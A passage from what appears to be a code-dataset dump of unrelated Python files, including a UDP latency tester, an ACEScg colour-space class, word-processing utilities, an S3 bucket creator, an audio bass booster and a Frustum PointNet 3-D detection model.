callbacks_list = [checkpoint]
model.fit(X, y, epochs=80, batch_size=128, callbacks=callbacks_list)
992,177 | 48b3c92cc5934f7a7f72e6119122f30731987528 | from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
def plot():
    """Render two mirrored 3-D scatter point sets on a single axis."""
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    # First data set (red circles).
    xs =[1,2,3,4,5,6,7,8,9,10]
    ys =[5,6,2,3,13,4,1,2,4,8]
    zs =[2,3,3,3,5,7,9,11,9,10]
    # Mostly-negated mirror of the first set (blue triangles).
    xt =[-1,-2,-3,-4,-5,-6,-7,8,-9,-10]
    yt =[-5,-6,-2,-3,-13,-4,-1,2,-4,-8]
    zt =[-2,-3,-3,-3,-5,-7,9,-11,-9,-10]
    ax.scatter(xs, ys, zs, c='r', marker='o')
    ax.scatter(xt, yt, zt, c='b', marker='^')
    ax.set_xlabel('X Label')
    ax.set_ylabel('Y Label')
    ax.set_zlabel('Z Label')
    # Blocks until the window is closed.
    plt.show()
992,178 | 9f1bcfe1ec918658010281069d56e45cdab2dd90 | from socket import * # for python Socket API
import time # for timestamp data
from threading import Thread # for handling multiple requests
# a method for creating UDP client threads in order to send data to servers
def client(ipv4, port, targetNode):
    """Ping (ipv4, port) 1000 times over UDP and write the average RTT
    to <targetNode>-R3_link_cost.txt."""
    # an IPv4 socket is created with UDP
    # AF_INET is Internet protocol v4 adress family.
    # SOCK_DGRAM is a datagram-based protocol
    _client = socket(AF_INET, SOCK_DGRAM)
    _client.bind(('',port))# binding adress
    totalDelay = 0.0 # to keep total delay time
    delay = 0.0 # to keep delay for 1 message
    i = 0
    while i < 1000:
        # in order to send request to specified destination
        # The payload is the send timestamp, so the echo lets us compute RTT.
        _client.sendto(str(time.time()).encode(),(ipv4,port))
        # try to receive data
        reply, address = _client.recvfrom(1024)
        if reply:
            #if reply is not empty calculate the delay and add it to totalDelay, then print it
            i+=1
            delay = time.time()-float(reply);
            totalDelay += delay
            print(_client.getsockname(), delay)
    f = open(targetNode + "-R3_link_cost.txt", "w") # opens a file
    f.write(str(totalDelay/1000.0)) # writes avg. delay to opened file
    f.close() # closes the file
    _client.close()
# a method for creating UDP server threads in order to receive data from clients
def server(port):
    """Echo UDP datagrams back to their sender until 1000 have been handled."""
    # create a socket and assign given port to it.
    _server = socket(AF_INET, SOCK_DGRAM)
    _server.bind(('',port))
    try:
        i = 0
        while i < 1000:
            data, address = _server.recvfrom(1000) # receive data from the client
            if data:
                i+=1
                _server.sendto(data,address) # if data is not empty send it back
    finally:
        # Always release the socket, even on an unexpected error.
        _server.close()
# create clients to send data on different threads
# Each thread measures one link concurrently and writes its own result file.
clientSource = Thread(target = client, args = ('10.10.3.1', 20450, "Source")) # Source
clientSource.start()
clientR2 = Thread(target = client, args = ('10.10.6.1', 20451, "R2")) # R2
clientR2.start()
clientDestination = Thread(target = client, args = ('10.10.7.1', 20452, "Destination")) # Destination
clientDestination.start()
992,179 | f51bffc70cff988ad09a18ef472456b578bcf54a | # arguments, parameter, variable scope and return values
def myFunction(name):
    """Greet the user by printing the supplied name."""
    message = "You're name is: " + name
    print(message)
def getName():
    """Prompt on stdin and return the entered name."""
    name = input("What is your name:")
    return name
def runit():
    """Entry point: announce start, then greet the user by the name read from stdin."""
    print("Start the app ...")
    myFunction(getName())
# run the program
runit()

# global variable scope
# NOTE: this prompts a second time — once inside runit() and once here.
name = getName()
print(name)
|
992,180 | cda45da293c74d94aeb84380d1a5eee3e4a1edbb | """
ACEScg color space.
https://www.oscars.org/science-technology/aces/aces-documentation
"""
from ..channels import Channel
from ..spaces.srgb import sRGB
from .. import algebra as alg
from ..types import Vector
from typing import Tuple
AP1_TO_XYZ = [
[0.6624541811085053, 0.13400420645643313, 0.15618768700490782],
[0.27222871678091454, 0.6740817658111483, 0.05368951740793706],
[-0.005574649490394108, 0.004060733528982825, 1.0103391003129973]
]
XYZ_TO_AP1 = [
[1.6410233796943259, -0.32480329418479004, -0.23642469523761225],
[-0.663662858722983, 1.615331591657338, 0.01675634768553015],
[0.01172189432837537, -0.008284441996237407, 0.9883948585390213]
]
def acescg_to_xyz(acescg: Vector) -> Vector:
    """Convert ACEScg (AP1 primaries) to XYZ.

    (The previous docstring incorrectly said "ACEScc".)
    """
    return alg.dot(AP1_TO_XYZ, acescg, dims=alg.D2_D1)
def xyz_to_acescg(xyz: Vector) -> Vector:
    """Convert XYZ to ACEScg (AP1 primaries).

    (The previous docstring incorrectly said "ACEScc".)
    """
    return alg.dot(XYZ_TO_AP1, xyz, dims=alg.D2_D1)
class ACEScg(sRGB):
    """The ACEScg color class."""

    BASE = "xyz-d65"
    NAME = "acescg"
    SERIALIZE = ("--acescg",)  # type: Tuple[str, ...]
    # ACES white point chromaticity coordinates.
    WHITE = (0.32168, 0.33767)
    # Channels bounded at 65504 (the half-float maximum).
    CHANNELS = (
        Channel("r", 0.0, 65504.0, bound=True),
        Channel("g", 0.0, 65504.0, bound=True),
        Channel("b", 0.0, 65504.0, bound=True)
    )
    DYNAMIC_RANGE = 'hdr'

    def to_base(self, coords: Vector) -> Vector:
        """To XYZ."""
        return acescg_to_xyz(coords)

    def from_base(self, coords: Vector) -> Vector:
        """From XYZ."""
        return xyz_to_acescg(coords)
|
992,181 | 3c6d1ed2cc1635bc0fb8ca728723eba732af9b45 | from django.contrib import admin
# Register your models here.
from .models import Bahagian
from .models import Tatatertib
#from .models import Zon

# Register both models with the admin using default ModelAdmin options.
admin.site.register(Bahagian)
admin.site.register(Tatatertib)
#admin.site.register(Zon)
992,182 | 0ddfd52211394fa4456993986f4b894ced711ee8 | import string
class Solution:
    """LeetCode 828: sum of countUniqueChars over every substring of s."""

    def uniqueLetterString(self, s: str) -> int:
        """Count, over all substrings of *s*, the characters that occur
        exactly once in that substring, modulo 1e9+7.

        For a letter occurrence at index k with previous occurrence j and
        next occurrence i, that occurrence is unique in exactly
        (k - j) * (i - k) substrings; sum this contribution per letter.
        """
        last_two = {letter: (-1, -1) for letter in string.ascii_uppercase}
        total = 0
        for idx, ch in enumerate(s):
            older, newer = last_two[ch]
            total += (newer - older) * (idx - newer)
            last_two[ch] = (newer, idx)
        # Flush the final occurrence of every letter against the string end.
        for letter in last_two:
            older, newer = last_two[letter]
            total += (newer - older) * (len(s) - newer)
        return total % (10 ** 9 + 7)
a = Solution()
print(a.uniqueLetterString("ABA"))
|
992,183 | fc08a72127b10c701b7648e6c1e6250d2f748383 | # -*- encoding: utf-8 -*-
import ConfigParser
import string, os, sys

cf = ConfigParser.ConfigParser()
cf.read("test.conf")
# Return all sections of the config file.
s = cf.sections()
print 'section:', s
# All option names inside the [db] section.
o = cf.options("db")
print 'options:', o
# items() returns (key, value) pairs for the section.
v = cf.items("db")
print 'db:', v
# dict() turns the pair list into an option -> value mapping.
v = dict(cf.items("db"))
print 'db:', v
def is_reverse(first_word, second_word):
    """ Verify that the first word is the same as the second word reversed """
    if len(first_word) != len(second_word):
        return "Not the same as the first word !"
    fwd_count = 0
    bckwd_count = len(second_word) - 1
    # Compare every position. The original loop condition was
    # `bckwd_count > 0`, which never checked the last character of
    # first_word against the first character of second_word and so
    # accepted non-reversed pairs like ("ab", "xa").
    while bckwd_count >= 0:
        if first_word[fwd_count] == second_word[bckwd_count]:
            fwd_count += 1
            bckwd_count -= 1
        else:
            return "Not the same as the first word !2"
    return first_word + " is the same as " + second_word + " reversed !"
def word_count(lst, word):
    """ Count the occurrences of *word* in a list.

    The search word is lower-cased before comparison; list items are
    compared as-is (original behavior preserved). The original while-loop
    condition (`position > 0`) stopped one element early and never
    examined the last item of the list.
    """
    word = word.lower()
    count = 0
    for item in lst:
        if item == word:
            count += 1
    return count
def word_list():
    """ Get a file with words and make it into a list """
    # Filename is prompted interactively (Python 2 raw_input).
    words = open(raw_input('Enter filename :'), 'r')
    lst = []
    for item in words:
        lst.append(item.strip()) #strip() removes the \n that are added by the encoding
    return lst
def has_no_e(file_name):
    """Get a file as input and return the amount of words that have the letter 'e' in them """
    # NOTE(review): despite the name `has_no_e`, this counts (and prints)
    # lines that DO contain an 'e' — confirm which behavior was intended.
    words = open(file_name, 'r')
    count = 0
    for item in words:
        if 'e' in item:
            print item
            count += 1
    return count
def is_sorted(a_list):
    """ Return True when *a_list* is already in ascending order, else False. """
    return sorted(a_list) == a_list
def is_anagram(first_word, second_word):
    """ Return True when the two words contain exactly the same letters. """
    return sorted(first_word) == sorted(second_word)
def words_from_text(file_with_text):
    """ Open a file with text and return the number of words and the amount of different words in the text """
    import string
    # A set gives O(1) membership tests; the original scanned a list for
    # every word (quadratic overall). `with` also closes the leaked handle.
    seen = set()
    amount_of_words = 0
    with open(file_with_text, 'r') as text:
        for line in text:
            line = line.replace('-', ' ')
            for word in line.split():
                word = word.strip(string.punctuation + string.whitespace)
                word = word.lower()
                seen.add(word)
                amount_of_words += 1
    number_different_words = len(seen)
    return (" This book has a total of %s words. It has %s different words !") % (amount_of_words, number_different_words)
print "-- Perlycross -- \n" + words_from_text('project_gutenberg.txt')
print " \n \n "
print "-- Life and Adventures of 'Billy' Dixon -- \n" + words_from_text('project_gutenberg_2.txt')
def robeco_travel(amount_of_people):
    """ Calculate travel expenses for Robeco travel """
    # All monetary inputs are prompted interactively (Python 2 raw_input).
    days = int(raw_input("Enter days of the travel : "))
    flight_price = float(raw_input("Enter Plane ticket price : "))
    train_price = float(raw_input("Enter Train icket price : "))
    hotel_price = float(raw_input("Enter Hotel price per night : "))
    daily_accomodation = int(raw_input("Enter Daily accomodation amount : "))
    # Per-person cost: tickets plus nightly hotel and daily allowance,
    # multiplied by the head count.
    total = (flight_price + train_price + ( hotel_price * days ) + ( daily_accomodation * days )) * amount_of_people
    print "The total amount of money for %d people is %d EUR !" % (amount_of_people, total)
#########################################################################################################
# The rest are not completely tested
#########################################################################################################
def ArrayAdditionI(arr):
    """
    Return 'true' when some combination of the other numbers in *arr*
    sums to the largest number, otherwise 'false'.
    ex. [4, 6, 23, 10, 1, 3] -> 'true' because 4 + 6 + 10 + 3 = 23

    The original returned 'false' as soon as the running sum of the
    sorted values dipped below the maximum, which rejected almost every
    valid input (including its own docstring example). This version
    tries every non-empty subset of the remaining numbers.
    """
    from itertools import combinations
    target = max(arr)
    rest = sorted(arr)
    rest.remove(target)  # drop exactly one instance of the maximum
    for size in range(1, len(rest) + 1):
        for combo in combinations(rest, size):
            if sum(combo) == target:
                return 'true'
    return 'false'
def common_words(first, second):
    """ Get two strings of comma-separated words and return the words that occur in both strings """
    # Split the strings into lists of words
    first_words = first.split(',')
    second_words = second.split(',')
    duplicate_words = []
    # Check if there are duplicate words in the lists
    # NOTE(review): a word repeated in `first` is appended once per
    # occurrence — confirm whether the result should be de-duplicated.
    for item in first_words:
        if item in second_words:
            duplicate_words.append(item) # Create a list of the duplicate words
    result = ','.join(sorted(duplicate_words))
    if len(duplicate_words) == 0:
        print "There are no common words in the two strings."
    return result
def absolute_sort(numbers_array):
    """ Sort numbers by absolute value (stable for ties). """
    return sorted(numbers_array, key=abs)
def Progression(arr):
    """
    Check if arr is a list of numbers that are in Arithmetic, Geometric or without any progression.
    Exmaple :
    return "Arithmetic" if ex. [2, 4, 6, 8]
    return "Geometric" if ex. [2, 6, 18, 54]
    return -1 if none
    """
    # Check if array is with at least 3 elements
    # NOTE(review): returns int 0 here although the docstring promises -1
    # (and the "none" branch below returns the string "-1") — confirm.
    if len(arr) < 3: return 0
    # Calculate difference between numbers in list
    diffAr = arr[1] - arr[0]
    # NOTE(review): raises ZeroDivisionError when arr[0] == 0; on Python 2
    # integer input this is floor division, on Python 3 true division.
    diffGeo = arr[1] / arr[0]
    # Temp vars to check if list is in progression
    isA = True
    isG = True
    for num in range(1, len(arr)):
        if arr[num] - arr[num - 1] != diffAr: #Check if progression is Arithmetic
            isA = False
        if arr[num] / arr[num -1] != diffGeo: #Check if progression is Geometric
            isG = False
    if isA:
        return "Arithmetic"
    elif isG:
        return "Geometric"
    else:
        return "-1"
# Test function
print Progression([2, 4, 16, 24])
print Progression([5, 10, 15])
print Progression([2, 6, 18, 54])
print Progression([2, 6])
# Palindrome Checker Program

import stack

# welcome
print('This program can determine if a given string is a palindrome')
print('(Enter return to exit)')

# init
char_stack = stack.getStack()
empty_string = ''

# get string from user
chars = input('Enter string to check')
while chars != empty_string:
    if len(chars) == 1:
        print('A one letter word is by definition a palindrome\n')
    else:
        is_palindrome = True
        # floor division handles strings of odd length
        compare_length = len(chars) // 2
        # push second half of input string on stack
        # (the original pushed onto `char_Stack`, a name that was never
        # defined — the stack was created as `char_stack` — so every
        # multi-character input raised NameError)
        for k in range(compare_length, len(chars)):
            stack.push(char_stack, chars[k])
        # pop chars and compare to first half of string
        k = 0
        while k < compare_length and is_palindrome:
            ch = stack.pop(char_stack)
            if chars[k].lower() != ch.lower():
                is_palindrome = False
            k = k + 1
        # display results
        if is_palindrome:
            print(chars, 'is a palindrome \n')
        else:
            print(chars, 'is NOT a palindrome\n')
    # get next string from user
    chars = input('Enter string to check: ')
|
def last2(str):
    """Return how many times the two-character ending of *str* appears
    earlier in the string; the final occurrence itself is not counted."""
    tail = str[-2:]
    # Candidate start positions stop two short of the end, matching the
    # original's `i + 2 <= n - 1` guard.
    return sum(1 for start in range(len(str) - 2) if str[start:start + 2] == tail)
|
992,186 | 6a465f0a811421155537b1cfd2096145f316e245 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import random
import time
from threadpool.threadpool import ThreadPool
from network.network_msg import LocalAuthMsg
from dispatcher.login_service import LoginService
def test_for_client():
    """Placeholder entry point; the actual driver runs under __main__ below."""
def queryAction4Test(sock):
    """Send one login request for a random seeded test account over *sock*."""
    # Pick one of the seven test accounts (test1 .. test7).
    i = random.randint(1, 7)
    username = 'test' + str(i)
    password = 'test'
    msg = LocalAuthMsg(
        LoginService.SID,
        LoginService.HandleLoginCmdID,
        0,
        username,
        password
    )
    print 'send: ', msg.to_json()
    # Messages on the wire are newline-delimited JSON.
    sock.sendall(msg.to_json() + '\n')
def setup_network(host, port):
    """Open a TCP connection to (host, port) and return the socket."""
    # print 'setup_network start'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # sock.setblocking(0)
    # Short timeout so the recv loop in __main__ polls instead of blocking.
    sock.settimeout(0.01)
    sock.connect((host, port))
    # print 'setup_network ', sock
    return sock
if '__main__' == __name__:
    # host = '10.251.40.248'
    host = socket.gethostname()
    port = 57890
    sock = setup_network(host, port)
    threadpool = ThreadPool()
    # print threadpool
    try:
        while True:
            # Queue two login requests per one-second cycle.
            for i in xrange(2):
                threadpool.put(queryAction4Test, (sock,))
                # queryAction4Test(sock)
            # Drain replies; recv times out after 0.01s, so this is a
            # bounded poll rather than a blocking read.
            for _ in xrange(10):
                data = ''
                try:
                    data = sock.recv(4096)
                except:
                    pass
                if data != '':
                    print 'recieve: ', data
            time.sleep(1)
    except KeyboardInterrupt:
        # Ctrl-C: release the socket and worker threads before exit.
        sock.close()
        threadpool.close()
|
992,187 | 0c5352321deda86013dfd09a473ea9da04a4a680 | import pyglet
import time

# Preload the warning clip fully into memory (streaming=False).
notif = pyglet.media.load("voice/warningMasker1.mp3",streaming = False)

def mainkan():
    # Start playback, then sleep so the process stays alive while the
    # clip plays (pyglet plays asynchronously).
    notif.play()
    time.sleep(5)

mainkan()
|
992,188 | b4683a60d3ebfd5eb3062bccd666e670e5923cbc | # from a given list of 4 letter words, check using dictionary if changing
# one letter produces a new valid word
import copy

# Words already found (one per line; [:-1] drops the trailing newline).
dictionary=set()
for word in open("output_ex1.txt", "r"):
    dictionary.add(word[:-1])
# NOTE(review): line[:-2] assumes CRLF line endings — confirm.
endict = [line[:-2] for line in open("english_dictionary.txt", "r") if len(line)==6] # 4 character words in dictionary
newwords = set()
for word in dictionary:
    # Four working copies of the word, one per character position.
    wordmatrix = [copy.deepcopy(list(word))] + [copy.deepcopy(list(word))] + [copy.deepcopy(list(word))] + [copy.deepcopy(list(word))]
    for c in xrange(ord('a'), ord('z')+1):
        # Substitute the candidate letter into position i of copy i.
        for i in range(0,4):
            wordmatrix[i][i] = chr(c)
        # Keep every variant that is a real dictionary word.
        newwords.update(set(["".join(w) for w in wordmatrix if "".join(w) in endict]))
dictionary.update(newwords)
with open("output_ex2.txt", "w") as f_out:
    for w in sorted(dictionary, key=str):
        f_out.write(w + "\n")
__author__ = 'anthonymcclay'
__project__ = 'botoExamples'
__date__ = '7/27/17'
__revision__ = '$'
__revision_date__ = '$'

import boto3
import argparse
import textwrap

# CLI: one required bucket name, optional AWS region.
parser = argparse.ArgumentParser(
    formatter_class=argparse.RawDescriptionHelpFormatter,
    description=textwrap.dedent('''\
    This program Creates a new
    s3 Bucket.
    ----------------------
    '''),
    epilog='''
 BigManSoftware Copyright 2017 - BigmanSoftware
 Developed by : Tony McClay
 Date: 7/24/2017
 All Rights reserved''')
parser.add_argument("bucketName", help="The name of the S3 Bucket to create")
parser.add_argument("--location", help="The Location of the S3 Bucket",
                    default='us-east-2',
                    )
# parser.add_argument("--acl", help="The Access control List",
#                     default='private',
#                     choices=['private','public-read','public-read-write','authenticated-read']
#                     )
args = parser.parse_args()
print(args)
bucketName = args.bucketName
location = args.location
# acl = args.acl
print("amazon aws Bucket Name : " + bucketName)

# boto3 was imported a second time here in the original; once is enough.
s3 = boto3.client('s3')
response = s3.create_bucket(Bucket=bucketName,
                            CreateBucketConfiguration={
                                'LocationConstraint': location
                            }
                            )
print(response['Location'])
print("created")
|
992,190 | 7f5bd8723f736989aa6a3b946d61a0852278a389 | from pydub import AudioSegment
import numpy as np
import math
attenuate_db = 0
accentuate_db = 2
# https://github.com/paarthmadan/bass-boost/blob/0b58e27049a8ad8d171dae7535384981c741fd58/index.py#L11
def boost(sample):
    """
    Bass-boost `sample`, yielding progress markers along the way.

    Yields the ints 1-7 after each processing step (so a caller can
    update progress information) and finally yields the processed
    AudioSegment itself.

    :param sample: pydub.AudioSegment to process
    :return: generator; the last yielded value is the boosted audio
    """
    assert isinstance(sample, AudioSegment)
    # get the raw audio
    yield 1
    track_raw = sample.get_array_of_samples()
    # as list
    yield 2
    track_raw = list(track_raw)
    # c-value
    yield 3
    est_mean = np.mean(track_raw)
    # a-value
    yield 4
    est_std = 3.0 * np.std(track_raw) / (math.sqrt(2))
    yield 5
    # Cutoff frequency derived from the sample statistics.
    # NOTE(review): the 0.005 factor is presumably tuned empirically -
    # see the referenced bass-boost project linked above.
    bass_factor = int(round((est_std - est_mean) * 0.005))
    yield 6
    filtered = sample.low_pass_filter(bass_factor)
    yield 7
    # Mix the attenuated original with the accentuated low-pass band.
    combined = (sample - attenuate_db).overlay(filtered + accentuate_db)
    yield combined
# end def
def boost_complete(sample):
    """Run boost() to completion and return the processed audio.

    boost() yields int progress markers (1-7) followed by the final
    processed AudioSegment; skip the markers and return that final
    non-int value.

    :param sample: pydub.AudioSegment to process
    :return: the boosted AudioSegment, or None if boost() never yields
        a non-int value
    """
    for x in boost(sample):
        # Bug fix: the original tested `not isinstance(x, str)`, which
        # is also true for the int progress markers, so it returned the
        # first marker (1) instead of the processed audio.
        if not isinstance(x, int):
            return x
        # end if
    # end for
# end def
992,191 | 7a8aa12d23825bd5753d687d418e7c3459e0524b | from setuptools import setup
import sys
# Bootstrap: setuptools-rust must be importable before setup() runs.
# If it is missing, install it on the fly and retry the import.
# NOTE(review): installing packages at setup time is a known antipattern;
# kept as-is to preserve behavior.
try:
    from setuptools_rust import RustExtension, Binding
except ImportError:
    import subprocess
    errno = subprocess.call([sys.executable, "-m", "pip", "install", "setuptools-rust"])
    if errno:
        print("Please install setuptools-rust package")
        raise SystemExit(errno)
    else:
        from setuptools_rust import RustExtension, Binding
setup(
    name="rust-python-ctypes",
    description='Example project to extend python with rust and ctypes',
    install_requires=['setuptools-rust'],
    version="0.1.0",
    # Binding.NoBinding: build the cdylib as-is; Python talks to it via
    # ctypes rather than a PyO3/rust-cpython binding layer.
    rust_extensions=[RustExtension("rust_python_ctypes.librust_python_ctypes", binding=Binding.NoBinding)],
    packages=["rust_python_ctypes"],
    # Not zip-safe: the compiled shared library must exist on disk.
    zip_safe=False,
)
|
992,192 | d8aeecf1626fbf8dd29c584be063600293f0cfdc | import pytest
@pytest.fixture
def fixture_example():
    """Minimal fixture demonstrating setup/teardown around a yield."""
    print("Setup phase")
    yield
    print("Teardown phase")
def test_one(fixture_example):
    """Example test that requests the fixture by parameter name."""
    print("Inside test")
992,193 | 3372ee9b416e9f553a6f291fe3c00172b1433edb | import Helpers as hlp
from Javis_algorithms import Merge_sort as mrg
"""
BINARY TREE IMPLEMENTATION + RANDOM TREE GENERATOR
All the tree nodes have leaves, so the final nodes are full of None leaves
"""
class Node:
    """Binary-search-tree node; empty child positions hold None."""

    def __init__(self, data):
        self.left = None
        self.right = None
        self.data = data

    def insert(self, data):
        """Insert `data` preserving BST order; duplicates are ignored."""
        if self.data:
            if data < self.data:
                if self.left is None:
                    self.left = Node(data)
                else:
                    self.left.insert(data)
            elif data > self.data:
                if self.right is None:
                    self.right = Node(data)
                else:
                    self.right.insert(data)
        else:
            # Node holds a falsy value (e.g. None): overwrite in place.
            self.data = data

    def random_tree_gerator(self, numNodes, lowerBound, upperBound):
        """Build a roughly balanced BST from random values; return its root.

        Bug fix: the original read the middle *value* and then called
        sorted_data.pop(value) - popping by index with a data value, which
        removes the wrong element or raises IndexError whenever the value
        is >= len(sorted_data).
        """
        random_data = hlp.random_list(numNodes, lowerBound, upperBound)
        sorted_data = mrg.merge_sort(random_data)
        # Pop the middle element by index so the root splits the data evenly.
        mid_index = len(sorted_data) // 2
        root = Node(sorted_data.pop(mid_index))
        for element in sorted_data:
            root.insert(element)
        return root

    def print_tree(self):
        """In-order traversal, printing each node's data."""
        if self.left:
            self.left.print_tree()
        print(self.data),
        if self.right:
            self.right.print_tree()
|
992,194 | c96ad0e72852efc26c1a4d1228c7163f0674559b | """Version 1 of the Frustum PointNet model used to train models for 3D object detection."""
# Partially based on the following works:
# (1) Charles R. Qi (https://github.com/charlesq34/frustum-pointnets)
# The main author of the Frustum PointNet paper. The source code was shared with Apache Licence v2.0.
# (ii) Siming Fan (https://github.com/simon3dv/frustum_pointnets_pytorch)
# Permission granted by the author of the source code in written form.
import os
import sys
sys.path.append(os.getcwd()+"/models")
from torch.nn import init
from torch.nn import init
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from provider import compute_box3d_iou
from model_utils import FrustumPointNetLoss, point_cloud_masking, parse_output_to_tensors
NUM_HEADING_BIN = 4
NUM_SIZE_CLUSTER = 1 # one size cluster per object class
class InstanceSegNet(nn.Module):
    def __init__(self, n_classes=1, n_channel=3):
        """
        3D Instance Segmentation Network for Frustum PointNet v1.

        :param n_classes: number of classes of objects that the net is being trained on
        :param n_channel: number of channels for each point (x, y, z) NOTE that reflectance is ignored in this
        implementation
        """
        super(InstanceSegNet, self).__init__()
        # Per-point feature extraction (1x1 convolutions = shared MLPs).
        self.conv1 = nn.Conv1d(n_channel, 64, 1)
        self.conv2 = nn.Conv1d(64, 64, 1)
        self.conv3 = nn.Conv1d(64, 64, 1)
        self.conv4 = nn.Conv1d(64, 128, 1)
        self.conv5 = nn.Conv1d(128, 1024, 1)
        # Segmentation head over the concatenation of per-point features
        # (64) + global feature (1024) + one-hot class vector (n_classes).
        # (Fixed comment: the original said 1024+64 but omitted n_classes.)
        self.conv6 = nn.Conv1d(1088 + n_classes, 512, 1)
        self.conv7 = nn.Conv1d(512, 256, 1)
        self.conv8 = nn.Conv1d(256, 128, 1)
        self.conv9 = nn.Conv1d(128, 128, 1)
        self.conv10 = nn.Conv1d(128, 2, 1)
        self.dropout = nn.Dropout(p=0.5)
        # Bug fix: self.bn1 was assigned twice in the original; the second
        # assignment silently replaced the first BatchNorm module, leaving
        # an orphaned, uselessly-allocated module.
        self.bn1 = nn.BatchNorm1d(64)
        self.bn2 = nn.BatchNorm1d(64)
        self.bn3 = nn.BatchNorm1d(64)
        self.bn4 = nn.BatchNorm1d(128)
        self.bn5 = nn.BatchNorm1d(1024)
        self.bn6 = nn.BatchNorm1d(512)
        self.bn7 = nn.BatchNorm1d(256)
        self.bn8 = nn.BatchNorm1d(128)
        self.bn9 = nn.BatchNorm1d(128)

    def forward(self, points, one_hot_vec):
        """
        3D Instance Segmentation Network for Frustum PointNet
        :param points: [batch_size, 3, n] input points from each frustum point cloud; reflectance is ignored in this
        implementation
        :param one_hot_vec: one hot vector for the classes being detected (see original implementation)
        :return: [batch_size, n, 2] logits for points belonging to the object of interest vs. background
        """
        batch_size = points.size()[0]
        num_points = points.size()[2]
        out = F.relu(self.bn1(self.conv1(points)))  # shape:(batch_size, 64, n)
        out = F.relu(self.bn2(self.conv2(out)))  # shape:(batch_size, 64, n)
        point_features = out  # kept for the skip-concatenation below
        out = F.relu(self.bn3(self.conv3(out)))  # shape:(batch_size, 64, n)
        out = F.relu(self.bn4(self.conv4(out)))  # shape:(batch_size, 128, n)
        out = F.relu(self.bn5(self.conv5(out)))  # shape:(batch_size, 1024, n)
        # Symmetric max-pool over the point dimension -> global feature.
        global_feature = torch.max(out, 2, keepdim=True)[0]  # shape:(batch_size, 1024, 1)
        one_hot_vec = one_hot_vec.view(batch_size, -1, 1)  # shape:(batch_size, n_classes, 1)
        global_feature = torch.cat([global_feature, one_hot_vec], 1)  # shape:(batch_size, 1024 + n_classes, 1)
        # Broadcast the global feature to every point and concatenate with
        # the per-point features.
        global_feature_repeat = global_feature.view(batch_size, -1, 1).repeat(1, 1, num_points)
        concatenated_feature = torch.cat([point_features, global_feature_repeat], 1)
        out = F.relu(self.bn6(self.conv6(concatenated_feature)))  # shape:(batch_size, 512, n)
        out = F.relu(self.bn7(self.conv7(out)))  # shape:(batch_size, 256, n)
        out = F.relu(self.bn8(self.conv8(out)))  # shape:(batch_size, 128, n)
        out = F.relu(self.bn9(self.conv9(out)))  # shape:(batch_size, 128, n)
        out = self.dropout(out)
        out = self.conv10(out)  # shape:(batch_size, 2, n)
        out = out.transpose(2, 1).contiguous()
        return out  # logits (softmax implemented in the loss calculation stage)
class TNet(nn.Module):
    """Regression network (T-Net) predicting a 3-D center offset from the
    masked object points and the one-hot class vector."""

    def __init__(self, n_classes=1):
        super(TNet, self).__init__()
        # Per-point feature extraction (1x1 convolutions).
        self.conv1 = nn.Conv1d(3, 128, 1)
        self.conv2 = nn.Conv1d(128, 128, 1)
        self.conv3 = nn.Conv1d(128, 256, 1)
        # Fully-connected regression head; the one-hot class vector is
        # appended to the pooled global feature before fc1.
        self.fc1 = nn.Linear(256 + n_classes, 256)
        self.fc2 = nn.Linear(256, 128)
        self.fc3 = nn.Linear(128, 3)
        self.bn1 = nn.BatchNorm1d(128)
        self.bn2 = nn.BatchNorm1d(128)
        self.bn3 = nn.BatchNorm1d(256)
        self.bn4 = nn.BatchNorm1d(256)
        self.bn5 = nn.BatchNorm1d(128)

    def forward(self, points, one_hot_vec):
        """Return a (batch_size, 3) center-offset regression."""
        n_batch = points.size()[0]
        feat = F.relu(self.bn1(self.conv1(points)))
        feat = F.relu(self.bn2(self.conv2(feat)))
        feat = F.relu(self.bn3(self.conv3(feat)))
        # Symmetric max-pool over the point dimension -> global feature.
        global_feat = feat.max(dim=2)[0]
        class_vec = one_hot_vec.view(n_batch, -1)
        fused = torch.cat([global_feat, class_vec], 1)
        hidden = F.relu(self.bn4(self.fc1(fused)))
        hidden = F.relu(self.bn5(self.fc2(hidden)))
        return self.fc3(hidden)
class BBoxNet(nn.Module):
    """Amodal 3-D box estimation network: regresses box center plus
    heading-bin and size-cluster scores/residuals from the centered
    object points."""

    def __init__(self, n_classes=1, n_channel=3):
        super(BBoxNet, self).__init__()
        # Per-point feature extraction (1x1 convolutions).
        self.conv1 = nn.Conv1d(n_channel, 128, 1)
        self.conv2 = nn.Conv1d(128, 128, 1)
        self.conv3 = nn.Conv1d(128, 256, 1)
        self.conv4 = nn.Conv1d(256, 512, 1)
        self.fc1 = nn.Linear(512 + n_classes, 512)
        self.fc2 = nn.Linear(512, 256)
        # Output layout: 3 center coords, then (score, residual) per
        # heading bin, then (score, 3 residuals) per size cluster.
        self.fc3 = nn.Linear(256, 3 + (2 * NUM_HEADING_BIN) + (4 * NUM_SIZE_CLUSTER))
        self.bn1 = nn.BatchNorm1d(128)
        self.bn2 = nn.BatchNorm1d(128)
        self.bn3 = nn.BatchNorm1d(256)
        self.bn4 = nn.BatchNorm1d(512)
        self.bn5 = nn.BatchNorm1d(512)
        self.bn6 = nn.BatchNorm1d(256)

    def forward(self, points, one_hot_vec):
        """Return (batch_size, 3 + 2*NUM_HEADING_BIN + 4*NUM_SIZE_CLUSTER)
        raw box parameters."""
        n_batch = points.size()[0]
        feat = F.relu(self.bn1(self.conv1(points)))
        feat = F.relu(self.bn2(self.conv2(feat)))
        feat = F.relu(self.bn3(self.conv3(feat)))
        feat = F.relu(self.bn4(self.conv4(feat)))
        # Max-pool over points -> global descriptor.
        pooled = feat.max(dim=2)[0]
        fused = torch.cat([pooled, one_hot_vec.view(n_batch, -1)], 1)
        hidden = F.relu(self.bn5(self.fc1(fused)))
        hidden = F.relu(self.bn6(self.fc2(hidden)))
        return self.fc3(hidden)
class FrustumPointNet(nn.Module):
    """End-to-end Frustum PointNet v1: instance segmentation -> T-Net
    centering -> amodal 3-D box estimation, returning losses and metrics.

    NOTE(review): forward() calls .cuda() unconditionally, so this model
    requires a CUDA device as written.
    """
    def __init__(self, n_classes=1, n_channel=3, return_preds=False):
        # :param n_classes: number of object classes (one size cluster each)
        # :param n_channel: point channels used (x, y, z)
